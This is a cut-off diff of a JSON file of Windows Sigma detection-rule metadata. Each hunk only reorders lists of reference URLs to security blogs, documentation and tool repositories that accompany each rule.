"https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml" ], "tags": [ @@ -14575,8 +14848,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/mattifestation/status/899646620148539397", "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://twitter.com/mattifestation/status/899646620148539397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml" ], "tags": [ @@ -14776,9 +15049,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker", "https://nxlog.co/documentation/nxlog-user-guide/applocker.html", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml" ], "tags": [ @@ -14849,11 +15122,11 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", + "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427", "https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c", "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs", - "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", - "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml" ], "tags": [ @@ -14902,10 +15175,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", - "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", - "Internal Research", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "Internal Research", + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml" ], "tags": [ @@ -14928,10 +15201,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", - "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", - "Internal Research", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "Internal Research", + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml" ], "tags": [ @@ -14954,10 +15227,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", - "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", - "Internal Research", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "Internal Research", + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml" ], "tags": [ @@ -14980,10 +15253,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", - "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", - "Internal Research", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "Internal Research", + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml" ], "tags": [ @@ -15030,9 +15303,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml" ], "tags": [ @@ -15343,8 +15616,8 @@ "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml" ], "tags": [ @@ -15401,8 +15674,8 @@ "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml" ], "tags": [ @@ -15460,9 +15733,9 @@ "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", "https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/", "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml" ], "tags": [ @@ -15496,8 +15769,8 @@ "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://labs.withsecure.com/publications/detecting-onenote-abuse", "https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md", + "https://labs.withsecure.com/publications/detecting-onenote-abuse", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml" ], "tags": [ @@ -15767,9 +16040,9 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf", "https://persistence-info.github.io/Data/recyclebin.html", + "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" ], "tags": [ @@ -15837,8 +16110,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml" ], "tags": [ @@ -15873,10 +16146,10 @@ "logsource.product": "windows", "refs": [ "https://nvd.nist.gov/vuln/detail/cve-2021-1675", - "https://www.lexjansen.com/sesug/1993/SESUG93035.pdf", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913", - "https://nvd.nist.gov/vuln/detail/cve-2021-34527", "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913", + "https://www.lexjansen.com/sesug/1993/SESUG93035.pdf", + "https://nvd.nist.gov/vuln/detail/cve-2021-34527", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml" ], "tags": [ @@ -15944,8 +16217,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/inversecos/status/1494174785621819397", "http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html", + "https://twitter.com/inversecos/status/1494174785621819397", "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_trust_record_modification.yml" ], @@ -16252,8 +16525,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", "https://github.com/eset/malware-ioc/tree/master/oceanlotus", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml" ], "tags": [ @@ -16595,8 +16868,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", + "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml" ], "tags": [ @@ -16770,10 +17043,10 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]", - "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", "https://github.com/hfiref0x/UACME", + "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", + "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" ], "tags": [ @@ -16848,8 +17121,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml" ], "tags": [ @@ -16882,8 +17155,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/MalwareJake/status/870349480356454401", "https://wikileaks.org/vault7/#Pandemic", + "https://twitter.com/MalwareJake/status/870349480356454401", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml" ], "tags": [ @@ -16916,9 +17189,9 @@ "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer", "http://woshub.com/how-to-clear-rdp-connections-history/", "https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html", - "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml" ], "tags": [ @@ -17092,11 +17365,11 @@ "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ + "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md", + "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", "https://docs.microsoft.com/en-us/windows/win32/shell/launch", "https://github.com/OTRF/detection-hackathon-apt29/issues/7", - "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md", - "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" ], "tags": [ @@ -17196,8 +17469,8 @@ "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/diskcleanuphandler.html", "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", + "https://persistence-info.github.io/Data/diskcleanuphandler.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml" ], "tags": [ @@ -17254,11 +17527,11 @@ "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", - "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", - "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", + "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", + "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_malware_netwire.yml" ], "tags": [ @@ -17324,8 +17597,8 @@ "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c", "https://persistence-info.github.io/Data/amsi.html", + "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_amsi_providers.yml" ], "tags": [ @@ -17415,8 +17688,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html", "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml" ], "tags": [ @@ -17458,8 +17731,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/Hexacorn/status/991447379864932352", - "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml", "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/", + "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml" ], "tags": [ @@ -17592,8 +17865,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/htmlhelpauthor.html", "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", + "https://persistence-info.github.io/Data/htmlhelpauthor.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_chm.yml" ], "tags": [ @@ -17673,8 +17946,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1674399582162153472", "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", + "https://twitter.com/0gtweet/status/1674399582162153472", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml" ], "tags": [ @@ -17848,11 +18121,11 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN", "https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6", - "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html", "https://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html", "https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/", - "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN", + "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml" ], "tags": [ @@ -17910,9 +18183,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml" ], "tags": [ @@ -17945,13 +18218,13 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", - "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", - "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", - "https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html", + "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" ], "tags": [ @@ -18018,8 +18291,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/malmoeb/status/1560536653709598721", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://twitter.com/malmoeb/status/1560536653709598721", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml" ], "tags": [ @@ -18043,9 +18316,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml" ], "tags": [ @@ -18086,8 +18359,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/wer_debugger.html", "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/", + "https://persistence-info.github.io/Data/wer_debugger.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml" ], "tags": [ @@ -18208,8 +18481,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/", "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml" ], "tags": [ @@ -18326,8 +18599,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://vanmieghem.io/stealth-outlook-persistence/", "https://twitter.com/_vivami/status/1347925307643355138", + "https://vanmieghem.io/stealth-outlook-persistence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_office_vsto.yml" ], "tags": [ @@ -18361,10 +18634,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml" ], "tags": [ @@ -18607,9 +18880,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/gtworek/PSBits/tree/master/SIP", "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf", "https://persistence-info.github.io/Data/codesigning.html", + "https://github.com/gtworek/PSBits/tree/master/SIP", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml" ], "tags": [ @@ -18644,9 +18917,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml" ], "tags": [ @@ -18879,8 +19152,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", + "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml" ], "tags": [ @@ -18936,8 +19209,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp", "https://twitter.com/WhichbufferArda/status/1543900539280293889", + "https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml" ], "tags": [ @@ -19079,8 +19352,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/inversecos/status/1494174785621819397", "Internal Research", + "https://twitter.com/inversecos/status/1494174785621819397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_trust_record_susp_location.yml" ], "tags": [ @@ -19180,8 +19453,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_globalflags.yml" ], "tags": [ @@ -19217,8 +19490,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/diskcleanuphandler.html", "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", + "https://persistence-info.github.io/Data/diskcleanuphandler.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml" ], "tags": [ @@ -19431,10 +19704,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://persistence-info.github.io/Data/userinitmprlogonscript.html", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml" ], "tags": [ @@ -19574,13 +19847,13 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", - "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", - "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", - 